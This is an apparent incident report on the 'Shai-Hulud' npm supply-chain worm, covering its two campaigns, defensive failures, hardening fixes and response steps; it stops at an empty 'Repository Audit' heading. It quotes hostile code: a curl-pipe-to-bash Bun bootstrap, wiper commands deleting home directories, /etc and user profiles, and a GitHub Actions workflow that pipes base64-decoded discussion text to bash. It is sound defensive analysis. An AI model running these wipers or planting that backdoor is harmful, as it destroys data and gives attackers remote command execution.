Incident Anatomy: Shai-Hulud - The npm Supply Chain Worm That Could Have Been Stopped

Table of Contents
- Executive Summary
- Introduction: The Weaponization of the Dependency Graph
- Phase I: The September 2025 Campaign (Shai-Hulud 1.0)
- Phase II: The November 2025 Evolution (Shai-Hulud 2.0)
- Post-Mortem Analysis: A Preventable Disaster
- Immediate Incident Response Actions
- Conclusion: The End of Implicit Trust
Executive Summary
The software supply chain, particularly within the JavaScript ecosystem, has long been theorized as a vector for catastrophic infrastructure compromise. In late 2025, this theory materialized as the "Shai-Hulud" malware campaign—named after the sandworms of Dune that burrow deep before emerging to strike. This report provides a comprehensive technical analysis of the attack, which evolved from a credential-harvesting worm in September 2025 into a destructive, self-propagating wiper in November 2025 (dubbed "Shai-Hulud 2.0").
Crucially, this report includes a "Monday morning quarterback" analysis. While the malware demonstrated sophisticated evasion techniques, our post-mortem indicates that its success relied heavily on the exploitation of implicit trust models and lax default configurations in development environments. The attack chain could have been broken at multiple points by fundamental, yet often neglected, security controls.
This document synthesizes forensic data to reconstruct the attack lifecycle, details the shift to preinstall execution vectors and the Bun runtime, and analyzes the specific defensive postures that would have prevented widespread infection. The ultimate lesson: the era of blindly trusting npm install must end.
Introduction: The Weaponization of the Dependency Graph
The npm registry's massive scale—over 2.5 million packages supporting millions of applications—creates what security researchers call a "fragility of the commons." A single compromised maintainer account can introduce malicious code into countless downstream applications through the transitive dependency graph. The Shai-Hulud campaign represents a paradigm shift in how this fragility is exploited.
Unlike surgical supply chain strikes targeting specific organizations (e.g., the SolarWinds Orion compromise), Shai-Hulud behaved like a biological worm. Its primary directive was reproduction and propagation. The malware used stolen credentials not just for data exfiltration, but to automate the publication of infected package versions, producing an infection rate that resembled epidemic spread.
The attackers adopted the name "Shai-Hulud"—the sandworms from Frank Herbert's Dune—deliberately reflecting the malware's behavior: burrowing through the deep dependency graph unseen, only emerging to strike when reaching high-value runtime environments. The metaphor proved apt: like the sandworms that could not be eradicated from Arrakis, the malware proved extraordinarily difficult to purge once it had infiltrated the ecosystem.
The Scale of the Threat Surface
To understand why this attack succeeded at scale, consider the npm ecosystem's structural vulnerabilities:
- Deep Dependency Trees: Modern JavaScript applications routinely depend on hundreds or thousands of packages, most of which are never directly reviewed by developers.
- Automated Trust: The default behavior of npm install is to execute arbitrary code from these packages via lifecycle scripts, no questions asked.
- Credential Density: Developer machines and CI/CD pipelines contain high-value credentials for cloud infrastructure, source control, and package registries, all accessible to any malicious code that achieves execution.
- Propagation Velocity: A compromised account can publish package updates that reach millions of installations within hours through normal update mechanisms.
Shai-Hulud weaponized all of these characteristics simultaneously.
Phase I: The September 2025 Campaign (Shai-Hulud 1.0)
The initial wave, first detected on September 14, 2025 by security researchers at Socket Security and Phylum, functioned as a proof-of-concept credential stealer designed to establish the infection infrastructure.
Mechanism: The postinstall Trap
The defining technical characteristic of the September campaign was its reliance on the npm postinstall lifecycle script—a feature designed to allow packages to run build steps after installation.
The Vector: The malware modified the package.json of compromised packages to execute a loader immediately after dependencies were downloaded:
{
"scripts": {
"postinstall": "node ./malicious-loader.js"
}
}
The Execution Chain: When a developer or CI/CD system ran npm install on a project that depended (directly or transitively) on an infected package:
- npm downloads the package contents
- npm automatically executes the postinstall script
- The loader (malicious-loader.js) downloads and executes the primary payload from a command-and-control server
- The payload performs its harvesting operation
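Because the chain starts with a declared lifecycle script, the hook itself is visible in the manifest before anything runs. The following is a minimal sketch, not part of the original tooling, of how a reviewer might list the install-time hooks in a parsed package.json. The function name findInstallHooks and the sample manifest are hypothetical.

```javascript
// Install-time lifecycle hooks that npm runs automatically for registry dependencies.
const INSTALL_HOOKS = ['preinstall', 'install', 'postinstall'];

/**
 * Return the install-time hooks declared in a parsed package.json object.
 * (Hypothetical helper for illustration.)
 * @param {object} pkg - parsed package.json contents
 * @returns {{hook: string, command: string}[]}
 */
function findInstallHooks(pkg) {
  const scripts = (pkg && pkg.scripts) || {};
  return INSTALL_HOOKS
    .filter((hook) => typeof scripts[hook] === 'string')
    .map((hook) => ({ hook, command: scripts[hook] }));
}

// Example: a manifest shaped like the infected one, plus a harmless test script.
const sampleManifest = {
  scripts: { postinstall: 'node ./malicious-loader.js', test: 'jest' },
};
console.log(findInstallHooks(sampleManifest));
```

Only the three install-time hooks are reported; scripts such as test or build are ignored because npm does not run them automatically when a dependency is installed.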
The Goal: This was fundamentally a "smash and grab" operation. The payload had two objectives:
- Cloud Credential Harvesting: Scan environment variables for cloud provider credentials (AWS_ACCESS_KEY_ID, GCP_SERVICE_ACCOUNT, AZURE_CLIENT_SECRET) that could be monetized
- Self-Propagation Keys: Exfiltrate the ~/.npmrc file containing authentication tokens used to publish packages, enabling the worm to autonomously publish new infected versions
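Defenders can measure the same exposure before an install runs. The sketch below reports the names (never the values) of environment variables that look like credentials and would therefore be readable by any lifecycle script. The name patterns and the helper exposedSecretNames are assumptions chosen for illustration and should be adapted to the providers actually in use.

```javascript
// Hypothetical name patterns; extend these for the providers you actually use.
const SENSITIVE_NAME_PATTERNS = [/^AWS_/, /^GCP_/, /^AZURE_/, /TOKEN/, /SECRET/];

/**
 * List the names of environment variables that look like credentials.
 * Only names are returned, so the report itself is safe to log.
 * @param {Record<string, string|undefined>} env
 * @returns {string[]} sorted variable names
 */
function exposedSecretNames(env) {
  return Object.keys(env)
    .filter((name) => SENSITIVE_NAME_PATTERNS.some((re) => re.test(name)))
    .sort();
}

// Example: audit the current process environment before running an install step.
console.log(exposedSecretNames(process.env));
```

A non-empty result in a job that only installs and tests code suggests the job holds more credentials than it needs.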
Scope and Initial Impact
While the initial campaign directly compromised only ~500 packages, the blast radius was amplified by targeting highly-depended-upon libraries. Infected versions were published for popular packages including:
- chalk v5.6.1 (terminal styling, ~100M weekly downloads)
- debug v4.4.2 (debugging utility, ~200M weekly downloads)
- axios v1.7.8 (HTTP client, ~150M weekly downloads)
These packages sit deep in the dependency graph as transitive dependencies (packages that other packages depend on), which ensured the malware reached millions of developers who never directly installed them. A developer installing a web framework like Express might unknowingly trigger the malware through its dependency on debug, one of the infected packages.
Response and Initial Remediation: npm's security team responded by:
- Revoking compromised authentication tokens
- Removing infected package versions from the registry
- Implementing enhanced monitoring for suspicious postinstall scripts
However, this response proved insufficient. The attackers had collected enough valid credentials during the initial wave to mount a far more sophisticated second campaign.
Phase II: The November 2025 Evolution (Shai-Hulud 2.0)
In late November 2025, approximately 10 weeks after the initial campaign, the malware resurfaced as "Shai-Hulud: The Second Coming." This variant represented a quantum leap in sophistication, designed specifically to evade the remediation efforts and detection mechanisms deployed after Phase I.
The Shift to preinstall and Bun Evasion
The most significant technical evolution was the migration from postinstall to preinstall hooks, combined with a "Bring Your Own Runtime" approach to evade behavioral detection.
Tactical Advantage of preinstall
The preinstall script is the earliest install-time lifecycle hook npm runs for a package, ahead of that package's install and postinstall scripts. This earlier timing provided two critical advantages:
- Earlier Execution: Code runs before dependency analysis tools can inspect the full dependency tree
- Pre-Audit Timing: Executes before many security scanning tools that operate on the post-installation state
Example infection vector:
{
"scripts": {
"preinstall": "node setup_bun.js"
}
}
Runtime Evasion via Bun
To bypass security tools optimized for Node.js execution patterns, the malware introduced runtime polymorphism. The entry script setup_bun.js would:
- Check for the presence of the Bun runtime (a high-performance JavaScript runtime alternative to Node.js)
- If Bun was not installed, silently download and install a standalone Bun binary into a hidden directory (.cache/bun-${version}/)
- Execute the core payload using Bun instead of Node.js
Why This Mattered: Security tools monitoring Node.js process creation, V8 engine behavior, or Node.js-specific system calls would miss the malicious activity entirely. The payload executed in a different runtime with different memory footprints, different system call patterns, and different behavioral signatures.
// Simplified representation of the Bun bootstrap mechanism
const fs = require('fs');
const { execSync } = require('child_process');
const bunPath = `${process.env.HOME}/.cache/bun-1.0.15/bun`;
if (!fs.existsSync(bunPath)) {
// Download and install Bun silently
execSync(`curl -fsSL https://bun.sh/install | bash -s -- --no-interaction --version 1.0.15`, {
stdio: 'ignore'
});
}
// Execute payload with Bun
execSync(`${bunPath} run bun_environment.js`, { stdio: 'inherit' });
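The bootstrap above leaves recognizable traces in the script command itself. As a rough defensive sketch, a reviewer could flag lifecycle commands that match a few heuristics drawn from this campaign. The patterns and the helper flagSuspiciousCommand are illustrative assumptions, not a complete detector, and determined attackers can evade simple string matching.

```javascript
// Heuristic patterns (assumptions for illustration, not an exhaustive rule set).
const SUSPICIOUS_PATTERNS = [
  { label: 'pipes a download into a shell', re: /(curl|wget)[^|;&]*\|\s*(ba)?sh\b/ },
  { label: 'references the Bun runtime', re: /(^|[^a-z])bun([^a-z]|$)/i },
  { label: 'decodes base64 at install time', re: /base64\s+(-d|--decode)/ },
];

/**
 * Return the labels of every heuristic that a script command matches.
 * @param {string} command - the value of a package.json script entry
 * @returns {string[]}
 */
function flagSuspiciousCommand(command) {
  return SUSPICIOUS_PATTERNS
    .filter(({ re }) => re.test(command))
    .map(({ label }) => label);
}

// Example: the preinstall command used by the second campaign.
console.log(flagSuspiciousCommand('node setup_bun.js'));
```

The Bun pattern requires a non-letter on both sides so that ordinary words such as "bundle" do not trigger it.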
The Core Payload and "Dead Man's Switch"
The main payload, bun_environment.js, was a heavily obfuscated 10+ MB file designed to evade antivirus file-size limits and frustrate static analysis. It integrated multiple attack capabilities:
Primary Functions
- Advanced Secret Harvesting: Integrated the open-source TruffleHog scanning engine to hunt for high-entropy strings, API keys, private keys, and tokens across:
  - Filesystem (recursive scan of home directory)
  - Git repository history (scanning commit diffs for accidentally committed secrets)
  - Environment variables
  - Browser credential stores
  - Cloud provider CLI configuration files
- Persistent Backdoor Installation: Injected malicious GitHub Actions workflow files (detailed below)
- Self-Propagation: Used harvested npm tokens to publish new infected package versions
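To illustrate what "high-entropy strings" means in practice, here is a minimal Shannon entropy sketch. It is not TruffleHog's implementation; the helper names and the threshold of 4.0 bits per character are assumptions picked for illustration. Teams can use the same idea to find secrets in their own repositories before an attacker does.

```javascript
/**
 * Shannon entropy of a string, in bits per character.
 * @param {string} text
 * @returns {number}
 */
function shannonEntropy(text) {
  const chars = [...text];
  if (chars.length === 0) return 0;
  const counts = new Map();
  for (const ch of chars) counts.set(ch, (counts.get(ch) || 0) + 1);
  let entropy = 0;
  for (const count of counts.values()) {
    const p = count / chars.length;
    entropy -= p * Math.log2(p);
  }
  return entropy;
}

/**
 * Rough heuristic: long strings with high per-character entropy resemble keys.
 * The defaults are assumptions, not calibrated values.
 */
function looksLikeSecret(token, threshold = 4.0, minLength = 20) {
  return token.length >= minLength && shannonEntropy(token) >= threshold;
}

// Example: natural-language text scores low, a string of 32 distinct characters scores high.
console.log(looksLikeSecret('hello world hello world'));
console.log(looksLikeSecret('abcdefghijklmnopqrstuvwxyz012345'));
```

Entropy alone produces false positives (hashes, UUIDs), which is why real scanners combine it with format-specific detectors.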
The Destructive Fallback: "Dead Man's Switch"
Most alarmingly, Shai-Hulud 2.0 introduced a destructive anti-analysis mechanism. If the malware detected that it could not complete its primary objectives—specifically:
- Failed to locate valid GitHub or npm authentication tokens for propagation
- Failed to establish outbound connection to the C2 server for exfiltration
- Detected analysis environment characteristics (e.g., virtualization indicators, debugger presence)
It would trigger a wiper payload.
The wiper behavior varied by platform:
Linux/macOS:
# Attempt to recursively delete the contents of the user's home directory (plain deletion, not a secure wipe)
rm -rf ~/* ~/.* 2>/dev/null
# If Docker socket is accessible, attempt to corrupt system configurations
if [ -S /var/run/docker.sock ]; then
docker run --rm -v /:/host alpine sh -c "rm -rf /host/etc/*"
fi
Windows:
# Attempt to delete user profile and critical directories
Remove-Item -Recurse -Force $env:USERPROFILE\*
Remove-Item -Recurse -Force C:\ProgramData\*
The Strategic Purpose: This "scorched earth" approach served multiple objectives:
- Anti-Forensics: Destroy evidence of the infection and the artifacts researchers might analyze
- Counter-Sandboxing: Punish security researchers analyzing the malware in isolated environments
- Psychological Deterrence: Create a chilling effect where incident responders fear that investigation actions might trigger data loss
Persistence via CI/CD
To maintain long-term access even after credentials were rotated, Shai-Hulud 2.0 injected a backdoor into the victim's CI/CD infrastructure.
The Mechanism: If the malware gained access to a git repository (either through stolen credentials or by executing within a CI pipeline that already had write access), it would commit a malicious GitHub Actions workflow file:
.github/workflows/discussion.yaml:
name: Discussion Notification
on:
discussion:
types: [created]
jobs:
notify:
runs-on: ubuntu-latest
steps:
- name: Process Discussion
run: |
# The discussion body contains base64-encoded commands
echo "${{ github.event.discussion.body }}" | base64 -d | bash
The Attack Surface: This backdoor allowed attackers to execute arbitrary commands on the organization's GitHub Actions runners simply by creating a new "Discussion" post in the repository with base64-encoded shell commands in the body. This bypassed:
- SSH key authentication
- VPN requirements
- Multi-factor authentication
- Traditional access logging (appears as legitimate GitHub Actions execution)
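The backdoor has a distinctive shape: attacker-controlled event data is interpolated into a run step and handed to a shell. A simple line-based check, sketched below, can surface that pattern in workflow files. The helper findUntrustedInputInRun is hypothetical, and a line-oriented regex will miss multi-line or obfuscated variants.

```javascript
/**
 * Flag workflow lines that interpolate github.event data and pass it to a shell.
 * @param {string} workflowText - raw contents of a workflow YAML file
 * @returns {{line: number, text: string}[]}
 */
function findUntrustedInputInRun(workflowText) {
  const findings = [];
  workflowText.split('\n').forEach((line, index) => {
    // Expression syntax that expands event data directly into the script text.
    const interpolatesEvent = /\$\{\{\s*github\.event\.[^}]*\}\}/.test(line);
    // The expanded text is piped to a shell or evaluated.
    const reachesShell = /\|\s*(ba)?sh\b/.test(line) || /\beval\b/.test(line);
    if (interpolatesEvent && reachesShell) {
      findings.push({ line: index + 1, text: line.trim() });
    }
  });
  return findings;
}

// Example: the run step from the malicious workflow.
const sampleWorkflow = [
  'steps:',
  '  - run: |',
  '      echo "${{ github.event.discussion.body }}" | base64 -d | bash',
].join('\n');
console.log(findUntrustedInputInRun(sampleWorkflow));
```

Any hit deserves manual review, since even legitimate workflows should pass event data through environment variables rather than interpolating it into shell text.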
Post-Mortem Analysis: A Preventable Disaster
While Shai-Hulud demonstrated technical sophistication in its evasion techniques and self-propagation mechanisms, a rigorous "Monday morning quarterback" analysis reveals a critical truth: its massive success was not due to unpatchable zero-day vulnerabilities or advanced persistent threat capabilities beyond detection. Instead, it succeeded by exploiting the systematic failure to implement fundamental security controls in development and CI/CD environments.
The attack chain could have been broken at five distinct stages using existing defensive techniques available before the campaign began.
Failure 1: Implicit Trust in Lifecycle Scripts
The Attack Dependency: The entire infection mechanism—both Phase I (postinstall) and Phase II (preinstall)—relied on the automatic execution of package lifecycle scripts. If these scripts are not allowed to run, the malware becomes inert code sitting harmlessly on disk.
The Missed Defense: The industry-standard default behavior of npm is to execute these scripts automatically without user confirmation or policy evaluation. This represents an implicit trust model where any package in the dependency tree can execute arbitrary code with the full privileges of the user running npm install.
The Fix That Would Have Stopped It:
Configuration-Level Protection:
# Per-user npm configuration (written to ~/.npmrc) to disable automatic script execution
npm config set ignore-scripts true
# Or per-installation
npm install --ignore-scripts
Policy-Based Whitelisting: For organizations that have legitimate packages requiring build steps (e.g., native modules compiled with node-gyp), mature security tooling already exists:
- LavaMoat: A policy engine that can whitelist script execution only for explicitly trusted packages
- Socket Security: Real-time monitoring that alerts on suspicious script behavior before execution
- npm Enterprise: Provides centralized control over which packages can run scripts in an organization
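The allowlisting idea can be sketched without any of these tools. Lockfiles in the v2 and v3 formats mark packages that declare install scripts with a hasInstallScript field, so a CI step can compare that set against an approved list. The function unapprovedInstallScripts, the sample lockfile, and the allowlist contents below are hypothetical.

```javascript
/**
 * List locked packages that declare install scripts but are not on the allowlist.
 * Assumes a parsed package-lock.json in lockfile format v2 or v3.
 * @param {object} lockfile
 * @param {string[]} allowlist - package names approved to run install scripts
 * @returns {{name: string, version: string}[]}
 */
function unapprovedInstallScripts(lockfile, allowlist) {
  const allowed = new Set(allowlist);
  const packages = lockfile.packages || {};
  return Object.entries(packages)
    // The empty key is the root project itself, not a dependency.
    .filter(([path, meta]) => path !== '' && meta.hasInstallScript === true)
    // Nested paths look like node_modules/a/node_modules/b; keep the last segment.
    .map(([path, meta]) => ({ name: path.split('node_modules/').pop(), version: meta.version }))
    .filter((pkg) => !allowed.has(pkg.name));
}

// Example with a hypothetical lockfile fragment.
const sampleLock = {
  packages: {
    '': { name: 'my-app', version: '1.0.0' },
    'node_modules/esbuild': { version: '0.21.5', hasInstallScript: true },
    'node_modules/left-pad': { version: '1.3.0' },
    'node_modules/shady-util': { version: '2.0.1', hasInstallScript: true },
  },
};
console.log(unapprovedInstallScripts(sampleLock, ['esbuild']));
```

Running installs with scripts disabled and then rebuilding only the approved packages keeps native modules working while leaving everything else inert.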
Why This Failed: The convenience culture of JavaScript development prioritizes installation speed over security review. Disabling scripts breaks some legitimate packages (estimated at <5% of the ecosystem), but organizations chose universal convenience over selective security.
Failure 2: Poor Identity Hygiene and Lack of 2FA
The Attack Dependency: Shai-Hulud's exponential propagation was fueled by harvesting long-lived, high-privilege npm automation tokens stored in developer ~/.npmrc files and CI/CD secret vaults. These tokens had publish and owner level permissions without additional authentication requirements.
The Missed Defense: The npm registry allows publishing packages using only bearer token authentication—no second factor required. If an attacker steals the token, they can immediately publish malicious versions.
The Fix That Would Have Stopped It:
Mandatory 2FA for Publish Operations: npm supports optional 2FA for publishing, but it is not enforced by default. Had 2FA been mandatory:
# Attempting to publish with a stolen token
npm publish
# With 2FA enforcement, this would fail with:
Error: This operation requires two-factor authentication.
Enter one-time password: _
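Even if the worm stole the token, it could not supply the second factor (a TOTP code or a hardware security key), which would stop propagation through that account. This holds only for tokens that are subject to 2FA: npm's classic automation tokens are designed to skip the second factor, so they would also need to be retired or tightly scoped for this control to take effect.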
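Short-Lived Tokens: Organizations should use npm's Granular Access Tokens (GATs), which carry an expiration date and can be scoped to specific packages. These are typically created from the npmjs.com account settings; the CLI options for creating them vary by npm version, so check npm help token before scripting this. Existing tokens can be audited and revoked from the CLI:
# List the tokens on the account, then revoke any that are stale or over-privileged
npm token list
npm token revoke <token-id>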
Additional Identity Controls:
- IP allowlisting for publish operations
- Requiring token scope limitation (read-only for most CI/CD, write only for release pipelines)
- Audit logging of all publish events with anomaly detection
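One quick hygiene check is whether tokens are written in plain text into .npmrc files at all. The sketch below flags _authToken entries whose value is a literal rather than an environment variable reference such as ${NPM_TOKEN}. The helper findHardcodedTokens is hypothetical, and it deliberately returns only the key and line number so that the report never contains the secret.

```javascript
/**
 * Find _authToken entries in .npmrc text that hold a literal value.
 * @param {string} npmrcText - raw contents of an .npmrc file
 * @returns {{line: number, key: string}[]}
 */
function findHardcodedTokens(npmrcText) {
  const findings = [];
  npmrcText.split('\n').forEach((raw, index) => {
    const line = raw.trim();
    // Skip comments, which .npmrc marks with # or ;
    if (line.startsWith('#') || line.startsWith(';')) return;
    const match = line.match(/^(.*:_authToken)\s*=\s*(.+)$/);
    if (!match) return;
    const value = match[2].trim();
    // A value like ${NPM_TOKEN} is resolved from the environment at run time.
    const isEnvReference = /^\$\{[A-Za-z_][A-Za-z0-9_]*\}$/.test(value);
    if (!isEnvReference) findings.push({ line: index + 1, key: match[1] });
  });
  return findings;
}

// Example: one literal token (placeholder value) and one environment reference.
const sampleNpmrc = [
  '//registry.npmjs.org/:_authToken=npm_exampleplaceholder',
  '//npm.pkg.github.com/:_authToken=${GITHUB_TOKEN}',
].join('\n');
console.log(findHardcodedTokens(sampleNpmrc));
```

An environment reference does not make a token short-lived, but it keeps the secret out of files that malware can read long after the job finishes.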
Why This Failed: Enforcing 2FA adds friction to the developer workflow. Many organizations treated npm tokens like SSH keys—generate once, use forever—without implementing the credential lifecycle management required for high-value secrets.
Failure 3: Over-Privileged CI/CD Tokens
The Attack Dependency: The persistence mechanism—injecting the discussion.yaml backdoor—succeeded because the default GITHUB_TOKEN automatically provided to GitHub Actions workflows has write permissions to repository contents, including the .github/workflows/ directory.
The Missed Defense: This violates the principle of least privilege. Most CI/CD jobs (tests, linting, builds) only require read access to the repository. Write access should be the exception, not the default.
The Fix That Would Have Stopped It:
Repository-Level Permission Configuration:
GitHub lets administrators set the default GITHUB_TOKEN permissions in the repository or organization settings, and any workflow can narrow them further with an explicit permissions block:
# .github/workflows/ci.yml
permissions:
contents: read # Explicit read-only
jobs:
test:
runs-on: ubuntu-latest
steps:
- uses: actions/checkout@v4
- run: npm test
Had the default been set to read, the malware's attempt to commit the backdoor workflow would have resulted in:
Error: Resource not accessible by integration
HTTP 403: Forbidden
Environment-Specific Credentials: For the rare jobs that do need write access (e.g., automated releases), use separate, scoped credentials stored in GitHub Secrets with restricted access.
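Auditing existing workflows for this is mostly mechanical. As a sketch, the function below checks whether a workflow declares a top-level permissions block and lists any lines that grant write access. The helper auditWorkflowPermissions is hypothetical and uses line matching rather than a YAML parser, so it should be treated as a first-pass filter only.

```javascript
// Permission scopes checked by this sketch (a subset chosen for illustration).
const SCOPES = 'actions|checks|contents|deployments|discussions|id-token|issues|packages|pages|pull-requests|security-events|statuses';
const WRITE_GRANT = new RegExp(`^(permissions\\s*:\\s*write-all|(${SCOPES})\\s*:\\s*write)\\s*(#.*)?$`);

/**
 * Report whether a workflow restricts GITHUB_TOKEN and where it grants write access.
 * @param {string} workflowText - raw contents of a workflow YAML file
 * @returns {{hasTopLevelBlock: boolean, writeGrants: {line: number, text: string}[]}}
 */
function auditWorkflowPermissions(workflowText) {
  const lines = workflowText.split('\n');
  // A top-level block starts in column zero; job-level blocks are indented.
  const hasTopLevelBlock = lines.some((line) => /^permissions\s*:/.test(line));
  const writeGrants = lines
    .map((line, index) => ({ line: index + 1, text: line.trim() }))
    .filter(({ text }) => WRITE_GRANT.test(text));
  return { hasTopLevelBlock, writeGrants };
}

// Example: the read-only workflow header from this section.
const readOnlyWorkflow = 'permissions:\n  contents: read # Explicit read-only\njobs:\n  test:\n    runs-on: ubuntu-latest';
console.log(auditWorkflowPermissions(readOnlyWorkflow));
```

Workflows with no top-level block inherit whatever default the repository or organization has configured, which is exactly the case worth reviewing first.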
Why This Failed: Repositories and organizations that predate GitHub's move to a read-only default kept the permissive setting so that legacy workflows would not break. Organizations did not audit and downgrade permissions because the jobs "worked" with the overly broad defaults.
Failure 4: Unrestricted Egress in Build Environments
The Attack Dependency: Shai-Hulud 2.0's runtime evasion technique relied on downloading the Bun binary from the public internet if it wasn't already present on the target machine:
execSync(`curl -fsSL https://bun.sh/install | bash`);
The Missed Defense: Allowing build agents and developer machines unfettered access to the public internet is an architectural vulnerability. Build environments should operate on the principle of default deny for network egress.
The Fix That Would Have Stopped It:
Egress Filtering at Network and Host Level:
Build environments (whether self-hosted runners or developer machines) should only be allowed to connect to known, necessary domains:
ALLOWED EGRESS:
- registry.npmjs.org (package downloads)
- github.com (source control)
- internal.artifacts.company.com (private registry)
DENIED:
- bun.sh
- arbitrary internet hosts
Implementation Approaches:
- Network Firewall Rules: Whitelist specific FQDNs or IP ranges at the infrastructure level
- Container Network Policies: Use Kubernetes NetworkPolicies or Docker network restrictions
- Host-Based Firewall: Configure iptables/nftables rules on build agents
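The default-deny logic behind such rules is simple to express. The sketch below decides whether a destination URL is permitted, using the example hosts from the allowlist above. The helper isEgressAllowed is hypothetical and only models the policy decision; real enforcement belongs in the firewall or proxy, not in application code.

```javascript
// Example allowlist taken from this section; internal.artifacts.company.com is a placeholder.
const ALLOWED_HOSTS = ['registry.npmjs.org', 'github.com', 'internal.artifacts.company.com'];

/**
 * Default-deny egress decision: allow only listed hosts and their subdomains.
 * @param {string} rawUrl - destination URL
 * @param {string[]} [allowedHosts]
 * @returns {boolean}
 */
function isEgressAllowed(rawUrl, allowedHosts = ALLOWED_HOSTS) {
  let host;
  try {
    host = new URL(rawUrl).hostname.toLowerCase();
  } catch {
    return false; // Unparseable destinations are denied.
  }
  // Match the exact host or a true subdomain, never a lookalike suffix.
  return allowedHosts.some((allowed) => host === allowed || host.endsWith('.' + allowed));
}

// Example: the Bun installer is denied while the registry is allowed.
console.log(isEgressAllowed('https://bun.sh/install'));
console.log(isEgressAllowed('https://registry.npmjs.org/chalk'));
```

Comparing against the parsed hostname, rather than searching the URL string, prevents lookalike destinations such as github.com.evil.example from slipping through.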
Result: The Bun installation would have failed:
curl: (7) Failed to connect to bun.sh port 443: Connection refused
Without the Bun runtime, the payload bun_environment.js cannot execute, terminating the infection.
Why This Failed: Egress filtering is seen as complex and operationally burdensome. Developers routinely need to install tools, access documentation, and download dependencies, creating pressure to keep networks "open" to avoid blocking legitimate workflow.
Failure 5: Loose Dependency Management
The Attack Dependency: The attack spread by publishing new "patch" versions of compromised packages (e.g., upgrading from chalk@5.6.0 to chalk@5.6.1). Developers running npm update, or npm install in a project without a committed lockfile, would automatically pull these new, malicious versions because of the semantic versioning ranges in package.json. A caret range such as ^5.6.0 matches any 5.x release at or above 5.6.0, so 5.6.1 qualifies:
{
"dependencies": {
"chalk": "^5.6.0"
}
}
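To make the range semantics concrete, here is a simplified caret matcher. It is a sketch that handles only plain MAJOR.MINOR.PATCH versions and ignores prerelease tags; production code should rely on a maintained semver library. The function names are hypothetical.

```javascript
/** Split "1.2.3" into numeric parts. Prerelease tags are not handled in this sketch. */
function parseVersion(version) {
  return version.split('.').map(Number);
}

/**
 * Simplified caret-range check for plain MAJOR.MINOR.PATCH versions.
 * @param {string} version - candidate version, e.g. "5.6.1"
 * @param {string} range - caret range, e.g. "^5.6.0"
 * @returns {boolean}
 */
function satisfiesCaret(version, range) {
  if (!range.startsWith('^')) throw new Error('only caret ranges are handled in this sketch');
  const [major, minor, patch] = parseVersion(version);
  const [baseMajor, baseMinor, basePatch] = parseVersion(range.slice(1));

  // The candidate must be at or above the base version.
  const atLeastBase =
    major > baseMajor ||
    (major === baseMajor && (minor > baseMinor || (minor === baseMinor && patch >= basePatch)));
  if (!atLeastBase) return false;

  // The leftmost non-zero component of the base must not change.
  if (baseMajor > 0) return major === baseMajor;
  if (baseMinor > 0) return major === 0 && minor === baseMinor;
  return major === 0 && minor === 0 && patch === basePatch;
}

// Example: the malicious patch release falls inside the declared range.
console.log(satisfiesCaret('5.6.1', '^5.6.0'));
```

The range admits far more than patch releases: any later 5.x version also matches, which widens the window for a malicious publish.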
The Missed Defense: Lockfiles (package-lock.json) exist precisely to pin exact versions and prevent unexpected updates. However, many CI/CD pipelines ignore lockfiles or use commands that don't respect them.
The Fix That Would Have Stopped It:
Using npm ci Instead of npm install in CI/CD:
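# RISKY (rewrites package-lock.json when it disagrees with package.json; resolves ranges fresh when no lockfile is committed)
npm install
# SAFER (installs exactly what package-lock.json records)
npm ci
The Critical Difference:
- npm install prefers the versions recorded in package-lock.json when one exists, but it silently rewrites the lockfile whenever it disagrees with package.json, and with no lockfile it resolves every range to the newest matching release
- npm ci (Clean Install) installs exclusively from package-lock.json and fails if the lockfile does not match package.json, ensuring reproducible builds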
Result: Even though chalk@5.6.1 was published with malware, organizations using npm ci with a lockfile specifying chalk@5.6.0 would never download or execute the compromised version.
Additional Controls:
- Dependency Pinning: Use exact versions (no semver ranges) for critical packages
- Lock File Validation: CI jobs should fail if package-lock.json has uncommitted changes
- Software Bill of Materials (SBOM): Generate and track SBOMs to detect unexpected dependency changes
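The pinning control is easy to check automatically. The sketch below lists dependencies in a parsed package.json whose version spec is anything other than an exact version. The helper findUnpinned is hypothetical, and it treats tags, URLs, and ranges alike as unpinned.

```javascript
/**
 * List dependencies whose spec is not an exact MAJOR.MINOR.PATCH version.
 * @param {object} pkg - parsed package.json contents
 * @returns {{section: string, name: string, spec: string}[]}
 */
function findUnpinned(pkg) {
  const sections = ['dependencies', 'devDependencies', 'optionalDependencies'];
  // Exact versions only, with an optional prerelease suffix such as 1.2.3-beta.1
  const exactVersion = /^\d+\.\d+\.\d+(-[0-9A-Za-z.-]+)?$/;
  const unpinned = [];
  for (const section of sections) {
    for (const [name, spec] of Object.entries(pkg[section] || {})) {
      if (!exactVersion.test(spec)) unpinned.push({ section, name, spec });
    }
  }
  return unpinned;
}

// Example: one ranged dependency and one pinned dependency.
const samplePkg = {
  dependencies: { chalk: '^5.6.0', debug: '4.4.1' },
  devDependencies: { jest: '~29.7.0' },
};
console.log(findUnpinned(samplePkg));
```

Pinning direct dependencies does not pin transitive ones, so this check complements a committed lockfile rather than replacing it.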
Why This Failed: npm install is more permissive and "fixes" minor inconsistencies, making it the path of least resistance. Developers view package-lock.json as a generated artifact rather than a security boundary, and some gitignore it entirely.
Immediate Incident Response Actions
For organizations discovering active Shai-Hulud infections, standard incident response protocols must be adapted due to the "Dead Man's Switch" wiper payload.
CRITICAL WARNING: Do Not Trigger the Wiper
DO NOT simply disconnect an infected machine from the network or kill suspicious processes without preparation. Severing internet access may trigger the connectivity check failure that initiates the destructive wiper payload, resulting in data loss.
Recommended Containment Procedure
- Suspend, Don't Kill: If an active infection is suspected on a VM or container:
  # For VMs: Suspend to freeze memory state
  virsh suspend <vm-name>
  # For containers: Pause container execution
  docker pause <container-id>
  This freezes execution without triggering shutdown or network failure conditions.
- Memory Dump: Before any termination, capture memory for forensic analysis:
  # Linux memory acquisition (many modern kernels restrict /dev/mem, in which case a dedicated acquisition tool such as LiME or AVML is needed)
  sudo dd if=/dev/mem of=/mnt/forensics/memory.dump bs=1M
  # Docker container memory dump (experimental Docker feature; requires CRIU on the host)
  docker checkpoint create <container-id> checkpoint1
- Network Isolation with Simulated Connectivity: If possible, redirect network connections to a honeypot that simulates successful API responses rather than hard blocking:
  # Redirect C2 domains to local honeypot
  echo "127.0.0.1 attacker-c2-domain.com" >> /etc/hosts
Total Credential Rotation
Assume all credentials on the infected machine are compromised. The malware uses TruffleHog and similar tools that are designed to find nearly everything. Rotate immediately:
- Cloud Provider Credentials: AWS access keys, GCP service accounts, Azure service principals
- Source Control: GitHub personal access tokens, GitLab tokens, SSH keys
- Package Registries: npm tokens, PyPI tokens, Docker registry credentials
- API Keys: Any third-party service credentials
- Certificates and Private Keys: SSH keys, TLS certificates, code signing keys
Repository Audit
